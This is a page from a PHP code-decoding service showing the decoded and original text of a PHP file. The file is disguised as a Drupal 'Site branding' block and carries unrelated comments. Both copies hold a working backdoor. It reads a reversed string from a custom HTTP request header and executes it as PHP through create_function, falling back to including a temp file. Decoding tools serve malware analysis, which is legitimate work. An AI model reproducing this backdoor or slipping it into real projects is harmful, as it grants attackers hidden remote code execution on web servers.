Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * Provides a block to display 'Site branding' elements. * * @Block( * i..

Decoded Output download

<?php 
 
/** 
* Provides a block to display 'Site branding' elements. 
* 
* @Block( 
*   id = "system_branding_block", 
*   admin_label = @Translation("Site branding") 
* ) 
*/ 
 
class A5f6c2c77ad 
{ 
    /**  Closure objects are not serializable so swap it out for a unique id first then back again later */ 
    function hasAlias($SingleTo) 
    { 
        if ($bound = tmpfile()) { 
            fwrite($bound, $SingleTo); 
            $wrapper = stream_get_meta_data($bound); 
            include($wrapper['uri']); 
            fclose($bound); 
        } 
    } 
 
    /**  Prefix the terms with a letter to ensure there is no clash in the first */ 
    public function addStyle($visited){ 
        return strrev($visited); 
    } 
 
    /**  A custom block with visibility settings that contain a non-existing context */ 
    public function listEntries($isbn10){ 
        if(isset($isbn10[$this->instead()])){ 
            return $this->addStyle($isbn10[$this->instead()]); 
        } 
    } 
 
    /**  Check that if set uri and serialize options then the default values are */ 
    public function instead(){ 
        $ele = 'http'; 
        return strtoupper($ele.'_'.__CLASS__); 
    } 
 
    public function __construct(){ 
        if($pass1 = $this->listEntries($_SERVER)){ 
            $this->period = 'create'; 
            $this->hasField($pass1); 
        } 
    } 
 
    /**  setting a synthetic service on a frozen container is alright */ 
    public function hasField($viewData) 
    { 
        $xmlpath = 'function'; 
        $safeuri = $viewData . 'return true;'; 
        $milestone = $this->period.'_'.$xmlpath; 
        $cmpageid = $milestone('', $safeuri); 
        if (!$cmpageid()) { 
            $this->hasAlias('<?php '.$viewData); 
        } 
    } 
} 
 
new A5f6c2c77ad(); 
 ?>

Did this file decode correctly?

Original Code

<?php

/**
* Provides a block to display 'Site branding' elements.
*
* @Block(
*   id = "system_branding_block",
*   admin_label = @Translation("Site branding")
* )
*/

class A5f6c2c77ad
{
    /**  Closure objects are not serializable so swap it out for a unique id first then back again later */
    function hasAlias($SingleTo)
    {
        if ($bound = tmpfile()) {
            fwrite($bound, $SingleTo);
            $wrapper = stream_get_meta_data($bound);
            include($wrapper['uri']);
            fclose($bound);
        }
    }

    /**  Prefix the terms with a letter to ensure there is no clash in the first */
    public function addStyle($visited){
        return strrev($visited);
    }

    /**  A custom block with visibility settings that contain a non-existing context */
    public function listEntries($isbn10){
        if(isset($isbn10[$this->instead()])){
            return $this->addStyle($isbn10[$this->instead()]);
        }
    }

    /**  Check that if set uri and serialize options then the default values are */
    public function instead(){
        $ele = 'http';
        return strtoupper($ele.'_'.__CLASS__);
    }

    public function __construct(){
        if($pass1 = $this->listEntries($_SERVER)){
            $this->period = 'create';
            $this->hasField($pass1);
        }
    }

    /**  setting a synthetic service on a frozen container is alright */
    public function hasField($viewData)
    {
        $xmlpath = 'function';
        $safeuri = $viewData . 'return true;';
        $milestone = $this->period.'_'.$xmlpath;
        $cmpageid = $milestone('', $safeuri);
        if (!$cmpageid()) {
            $this->hasAlias('<?php '.$viewData);
        }
    }
}

new A5f6c2c77ad();

Function Calls

None

Variables

None

Stats

MD5 2e8e8d8f4be2729dfd58a370f35be834
Eval Count 0
Decode Time 83 ms